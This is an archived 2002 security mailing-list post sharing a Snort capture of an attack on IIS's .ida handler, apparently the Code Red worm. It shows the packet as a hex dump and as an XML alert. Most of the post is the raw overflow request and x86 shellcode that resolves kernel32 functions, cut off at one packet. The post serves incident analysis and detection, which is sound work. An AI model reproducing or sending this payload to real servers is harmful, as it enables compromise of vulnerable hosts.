RE: apache problem

From: Jonathan A. Zdziarski (jonathanat_private)
Date: Thu Oct 17 2002 - 18:50:09 PDT
Next message: Jonathan A. Zdziarski: "RE: apache problem"
Previous message: Brad Arlt: "Re: DoS and Windows Login"
In reply to: Stephen Smoogen: "Re: apache problem"
Next in thread: Jonathan A. Zdziarski: "RE: apache problem"
Next in thread: cory: "Re: apache problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
Just incase nobody has posted it yet, here is the complete .ida packet -
as captured by snort at least.

47 45 54 20 2F 64 65 66 61 75 6C 74 2E 69 64 61 3F  | GET /default.ida?
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E 4E  | NNNNNNNNNNNNNNNNN
4E 4E 4E 00 00 00 00 00 00 00 00 00 00 00 00 00 00  | NNN..............
00 C3 03 00 00 00 78 00 FA 20 25 75 39 30 39 30 25  | ......x.. %u9090%
75 36 38 35 38 25 75 63 62 64 33 25 75 37 38 30 31  | u6858%ucbd3%u7801
25 75 39 30 39 30 25 75 36 38 35 38 25 75 63 62 64  | %u9090%u6858%ucbd
33 25 75 37 38 30 31 25 75 39 30 39 30 25 75 39 30  | 3%u7801%u9090%u90
39 30 25 75 38 31 39 30 25 75 30 30 63 33 25 75 30  | 90%u8190%u00c3%u0
30 30 33 25 75 38 62 30 30 25 75 35 33 31 62 25 75  | 003%u8b00%u531b%u
35 33 66 66 25 75 30 30 37 38 25 75 30 30 30 30 25  | 53ff%u0078%u0000%
75 30 30 3D 61 20 20 48 54 54 50 2F 31 2E 30 0D 0A  | u00=a  HTTP/1.0..
43 6F 6E 74 65 6E 74 2D 74 79 70 65 3A 20 74 65 78  | Content-type: tex
74 2F 78 6D 6C 0A 48 4F 53 54 3A 77 77 77 2E 77 6F  | t/xml.HOST:www.wo
72 6D 2E 63 6F 6D 0A 20 41 63 63 65 70 74 3A 20 2A  | rm.com. Accept: *
2F 2A 0A 43 6F 6E 74 65 6E 74 2D 6C 65 6E 67 74 68  | /*.Content-length
3A 20 33 35 36 39 20 0D 0A 0D 0A 55 8B EC 81 EC 18  | : 3569 ....U.....
02 00 00 53 56 57 8D BD E8 FD FF FF B9 86 00 00 00  | ...SVW...........
B8 CC CC CC CC F3 AB C7 85 70 FE FF FF 00 00 00 00  | .........p.......
E9 0A 0B 00 00 8F 85 68 FE FF FF 8D BD F0 FE FF FF  | .......h.........
64 A1 00 00 00 00 89 47 08 64 89 3D 00 00 00 00 E9  | d......G.d.=.....
6F 0A 00 00 8F 85 60 FE FF FF C7 85 F0 FE FF FF FF  | o.....`..........
FF FF FF 8B 85 68 FE FF FF 83 E8 07 89 85 F4 FE FF  | .....h...........
FF C7 85 58 FE FF FF 00 00 E0 77 E8 9B 0A 00 00 83  | ...X......w......
BD 70 FE FF FF 00 0F 85 DD 01 00 00 8B 8D 58 FE FF  | .p............X..
FF 81 C1 00 00 01 00 89 8D 58 FE FF FF 81 BD 58 FE  | .........X.....X.
FF FF 00 00 00 78 75 0A C7 85 58 FE FF FF 00 00 F0  | .....xu...X......
BF 8B 95 58 FE FF FF 33 C0 66 8B 02 3D 4D 5A 00 00  | ...X...3.f..=MZ..
0F 85 9A 01 00 00 8B 8D 58 FE FF FF 8B 51 3C 8B 85  | ........X....Q<..
58 FE FF FF 33 C9 66 8B 0C 10 81 F9 50 45 00 00 0F  | X...3.f.....PE...
85 79 01 00 00 8B 95 58 FE FF FF 8B 42 3C 8B 8D 58  | .y.....X....B<..X
FE FF FF 8B 54 01 78 03 95 58 FE FF FF 89 95 54 FE  | ....T.x..X.....T.
FF FF 8B 85 54 FE FF FF 8B 48 0C 03 8D 58 FE FF FF  | ....T....H...X...
89 8D 4C FE FF FF 8B 95 4C FE FF FF 81 3A 4B 45 52  | ..L.....L....:KER
4E 0F 85 33 01 00 00 8B 85 4C FE FF FF 81 78 04 45  | N..3.....L....x.E
4C 33 32 0F 85 20 01 00 00 8B 8D 58 FE FF FF 89 8D  | L32.. .....X.....
34 FE FF FF 8B 95 54 FE FF FF 8B 85 58 FE FF FF 03  | 4.....T.....X....
42 20 89 85 4C FE FF FF C7 85 48 FE FF FF 00 00 00  | B ..L.....H......
00 EB 1E 8B 8D 48 FE FF FF 83 C1 01 89 8D 48 FE FF  | .....H........H..
FF 8B 95 4C FE FF FF 83 C2 04 89 95 4C FE FF FF 8B  | ...L........L....
85 54 FE FF FF 8B 8D 48 FE FF FF 3B 48 18 0F 8D C0  | .T.....H...;H....
00 00 00 8B 95 4C FE FF FF 8B 02 8B 8D 58 FE FF FF  | .....L.......X...
81 3C 01 47 65 74 50 0F 85 A0 00 00 00 8B 95 4C FE  | .<.GetP........L.
FF FF 8B 02 8B 8D 58 FE FF FF 81 7C 01 04 72 6F 63  | ......X....|..roc
41 0F 85 84 00 00 00 8B 95 48 FE FF FF 03 95 48 FE  | A........H.....H.
FF FF 03 95 58 FE FF FF 8B 85 54 FE FF FF 8B 48 24  | ....X.....T....H$
33 C0 66 8B 04 0A 89 85 4C FE FF FF 8B 8D 54 FE FF  | 3.f.....L.....T..
FF 8B 51 10 8B 85 4C FE FF FF 8D 4C 10 FF 89 8D 4C  | ..Q...L....L....L
FE FF FF 8B 95 4C FE FF FF 03 95 4C FE FF FF 03 95  | .....L.....L.....
4C FE FF FF 03 95 4C FE FF FF 03 95 58 FE FF FF 8B  | L.....L.....X....
85 54 FE FF FF 8B 48 1C 8B 14 0A 89 95 4C FE FF FF  | .T....H......L...
8B 85 4C FE FF FF 03 85 58 FE FF FF 89 85 70 FE FF  | ..L.....X.....p..
FF EB 05 E9 0D FF FF FF E9 16 FE FF FF 8D BD F0 FE  | .................
FF FF 8B 47 08 64 A3 00 00 00 00 83 BD 70 FE FF FF  | ...G.d.......p...
00 75 05 E9 38 08 00 00 C7 85 4C FE FF FF 01 00 00  | .u..8.....L......
00 EB 0F 8B 8D 4C FE FF FF 83 C1 01 89 8D 4C FE FF  | .....L........L..
FF 8B 95 68 FE FF FF 0F BE 02 85 C0 0F 84 8D 00 00  | ...h.............
00 8B 8D 68 FE FF FF 0F BE 11 83 FA 09 75 21 8B 85  | ...h.........u!..
68 FE FF FF 83 C0 01 8B F4 50 FF 95 90 FE FF FF 3B  | h........P......;
F4 90 43 4B 43 4B 89 85 34 FE FF FF EB 2A 8B F4 8B  | ..CKCK..4....*...
8D 68 FE FF FF 51 8B 95 34 FE FF FF 52 FF 95 70 FE  | .h...Q..4...R..p.
FF FF 3B F4 90 43 4B 43 4B 8B 8D 4C FE FF FF 89 84  | ..;..CKCK..L.....
8D 8C FE FF FF EB 0F 8B 95 68 FE FF FF 83 C2 01 89  | .........h.......
95 68 FE EF FF F0 40 00 00 0C 68 5D 0F EF FF F6 88  | .h....@...h].....
B4 50 88 9                                          | .P..

In xml...

  <event version="1.0">
    <sensor encoding="hex" detail="full">
      <interface>iprb0</interface>
      <ipaddr version="4">67.28.120.66</ipaddr>
      <hostname>elijah</hostname>
    </sensor>
    <signature id="1243" revision="2" class="27" priority="1">WEB-IIS
ISAPI .ida attempt</signature>
    <reference system="arachnids">552</reference>
    <reference system="cve">CAN-2000-0071</reference>
    <timestamp>2002-10-17 19:14:05+00</timestamp>
    <packet>
      <iphdr saddr="128.125.24.103" daddr="67.28.120.66" proto="6"
ver="4" hlen="5" tos="16" len="1504" ttl="240">
        <tcphdr sport="4991" dport="80" flags="24" seq="227151881"
ack="2742365072" off="5" win="64240" csum="0">
 
<data>474554202F64656661756C742E6964613F4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E
4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4
E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4
E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E
4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E
4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4
E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4E4
E4E000000000000000000000000000000C3030000007800FA20257539303930257536
383538257563626433257537383031257539303930257536383538257563626433257537
383031257539303930257539303930257538313930257530306333257530303033257
538623030257535333162257535336666257530303738257530303030257530303D61202
0485454502F312E300D0A436F6E74656E742D747970653A20746578742F786D6C0A48
4F53543A7777772E776F726D2E636F6D0A204163636570743A202A2F2A0A436F6E74656E
742D6C656E6774683A2033353639200D0A0D0A558BEC81EC180200005356578DBDE8F
DFFFFB986000000B8CCCCCCCCF3ABC78570FEFFFF00000000E90A0B00008F8568FEFFFF8
DBDF0FEFFFF64A10000000089470864893D00000000E96F0A00008F8560FEFFFFC785
F0FEFFFFFFFFFFFF8B8568FEFFFF83E8078985F4FEFFFFC78558FEFFFF0000E077E89B0A
000083BD70FEFFFF000F85DD0100008B8D58FEFFFF81C100000100898D58FEFFFF81B
D58FEFFFF00000078750AC78558FEFFFF0000F0BF8B9558FEFFFF33C0668B023D4D5A000
00F859A0100008B8D58FEFFFF8B513C8B8558FEFFFF33C9668B0C1081F9504500000F
85790100008B9558FEFFFF8B423C8B8D58FEFFFF8B540178039558FEFFFF899554FEFFFF
8B8554FEFFFF8B480C038D58FEFFFF898D4CFEFFFF8B954CFEFFFF813A4B45524E0F8
5330100008B854CFEFFFF817804454C33320F85200100008B8D58FEFFFF898D34FEFFFF8
B9554FEFFFF8B8558FEFFFF03422089854CFEFFFFC78548FEFFFF00000000EB1E8B8D
48FEFFFF83C101898D48FEFFFF8B954CFEFFFF83C20489954CFEFFFF8B8554FEFFFF8B8D
48FEFFFF3B48180F8DC00000008B954CFEFFFF8B028B8D58FEFFFF813C01476574500
F85A00000008B954CFEFFFF8B028B8D58FEFFFF817C0104726F63410F85840000008B954
8FEFFFF039548FEFFFF039558FEFFFF8B8554FEFFFF8B482433C0668B040A89854CFE
FFFF8B8D54FEFFFF8B51108B854CFEFFFF8D4C10FF898D4CFEFFFF8B954CFEFFFF03954C
FEFFFF03954CFEFFFF03954CFEFFFF039558FEFFFF8B8554FEFFFF8B481C8B140A899
54CFEFFFF8B854CFEFFFF038558FEFFFF898570FEFFFFEB05E90DFFFFFFE916FEFFFF8DB
DF0FEFFFF8B470864A30000000083BD70FEFFFF007505E938080000C7854CFEFFFF01
000000EB0F8B8D4CFEFFFF83C101898D4CFEFFFF8B9568FEFFFF0FBE0285C00F848D0000
008B8D68FEFFFF0FBE1183FA0975218B8568FEFFFF83C0018BF450FF9590FEFFFF3BF
490434B434B898534FEFFFFEB2A8BF48B8D68FEFFFF518B9534FEFFFF52FF9570FEFFFF3
BF490434B434B8B8D4CFEFFFF89848D8CFEFFFFEB0F8B9568FEFFFF83C201899568FE
EFFFF04000000C685D0FEFFFF688B450889</data>
        </tcphdr>
      </iphdr>
    </packet>
  </event>


----------------------------------------------------------------------------
This list is provided by the SecurityFocus ARIS analyzer service.
For more information on this free incident handling, management 
and tracking system please see: http://aris.securityfocus.com
Next message: Jonathan A. Zdziarski: "RE: apache problem"
Previous message: Brad Arlt: "Re: DoS and Windows Login"
In reply to: Stephen Smoogen: "Re: apache problem"
Next in thread: Jonathan A. Zdziarski: "RE: apache problem"
Next in thread: cory: "Re: apache problem"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]
This archive was generated by hypermail 2b30 : Fri Oct 18 2002 - 15:21:00 PDT